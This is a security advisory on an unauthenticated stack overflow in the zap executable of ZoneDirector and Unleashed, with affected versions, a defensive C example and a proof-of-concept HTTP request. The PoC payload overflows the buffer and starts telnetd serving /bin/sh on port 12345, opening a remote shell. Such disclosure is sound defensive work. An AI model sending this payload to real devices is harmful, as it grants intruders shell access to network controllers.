Stack buffer overflow in zap executable

Aleph Research Advisory

  • ZoneDirector
  • Unleashed

Vulnerable Versions

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7


  • 9.10.x: Upgrade to
  • 9.12.x: Upgrade to
  • 9.13.x: Upgrade to
  • 10.0.x: Upgrade to
  • 10.1.x: Upgrade to
  • 10.2.x: Upgrade to
  • 10.3.x: Upgrade to
  • 200.6 and before: Upgrade to
  • 200.7: Upgrade to

Technical Details

Stack buffer overflow/remote code execution vulnerability via a crafted unauthenticated HTTP request

The zap executable contains an unsafe strncpy() call in its “-D” argument parser. A long “-D” value overflows the stack buffer and can be used to run arbitrary code. Unintended arguments can be passed to zap by using CVE-2019-19836.

Information about the exploitation of the vulnerability can be found in our blog post or the 36C3 talk.
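The copy defect the advisory describes, reconstructed as an added C example (not zap's own code, which is not on this page): a "-D" parser whose strncpy() bound is taken from the source string, beside a hardened version that bounds the copy by the destination and rejects a value that would not fit. The buffer size DEST_PATH_LEN, the function names and the sample argument values are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Constructed size for the stack buffer; the real buffer size in zap is not
 * stated in the advisory. */
#define DEST_PATH_LEN 64

/* Hypothetical reconstruction of the unsafe pattern the advisory describes:
 * strncpy() is called with a bound derived from the attacker-controlled
 * argument instead of the destination, so it offers no protection and a long
 * "-D" value writes past the end of the stack buffer. It is here to show the
 * defect; only call it with a short argument. */
int parse_d_unsafe(const char *arg, char dest[DEST_PATH_LEN])
{
    const char *value = arg + 2;               /* skip the "-D" prefix */
    size_t n = strlen(value) + 1;              /* bound from the source */
    strncpy(dest, value, n);                   /* overflows when n > DEST_PATH_LEN */
    return 0;
}

/* Hardened form: the bound comes from the destination, a value that would not
 * fit (terminator included) is rejected rather than silently truncated, and
 * the caller gets an error code it can act on. */
int parse_d_safe(const char *arg, char dest[DEST_PATH_LEN])
{
    if (arg == NULL || strncmp(arg, "-D", 2) != 0)
        return -1;                             /* not a -D option */
    const char *value = arg + 2;
    size_t len = strlen(value);
    if (len >= DEST_PATH_LEN)
        return -2;                             /* would overflow: reject */
    memcpy(dest, value, len + 1);              /* copies the terminator too */
    return 0;
}

/* Builds a constructed oversized "-D" argument (far longer than DEST_PATH_LEN,
 * like the long value in the PoC) and returns the hardened parser's verdict. */
int oversized_argument_rejected(void)
{
    char arg[256];
    char dest[DEST_PATH_LEN];
    memset(arg, 'A', sizeof arg);
    arg[0] = '-';
    arg[1] = 'D';
    arg[sizeof arg - 1] = '\0';
    return parse_d_safe(arg, dest);
}

/* Constructed short, legitimate value: returns 1 if it is accepted and copied
 * verbatim, 0 otherwise. */
int short_argument_ok(void)
{
    char dest[DEST_PATH_LEN];
    if (parse_d_safe("-D/tmp/ok", dest) != 0)
        return 0;
    return strcmp(dest, "/tmp/ok") == 0;
}

int main(void)
{
    char dest[DEST_PATH_LEN];
    printf("short -D accepted: %d\n", short_argument_ok());
    printf("oversized -D rejected with code %d\n", oversized_argument_rejected());
    parse_d_unsafe("-D/tmp/ok", dest);         /* safe only because the value is short */
    printf("unsafe parser copied: %s\n", dest);
    return 0;
}
```

The hardened parser fails closed: an over-long value returns an error instead of being truncated, which both prevents the overflow and gives the calling code a signal worth logging, since a "-D" value longer than any legitimate path is exactly what the PoC request carries.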

Proof Of Concept

Stack buffer overflow in the zap executable using an unauthenticated ajax request:

POST /tools/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
Content-Length: 473

<ajax-request action='docmd' xcmd='wc' updater='system.1568118269965.3208' comp='zapd'>
<xcmd cmd='wc' comp='zapd' wcid=1 client='' tool='zap-up' zap-type='udp' server=' -D/tmp/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0A2p������p���5Ad6$r��d8Ad9Ae0Ae1A3Ae4Ae5Ae6A,e7AeCCCCDDDD������������f5Af6Af7,CCCC,telnetd,-l/bin/sh,-p12345' syspmtu=65500 />

External References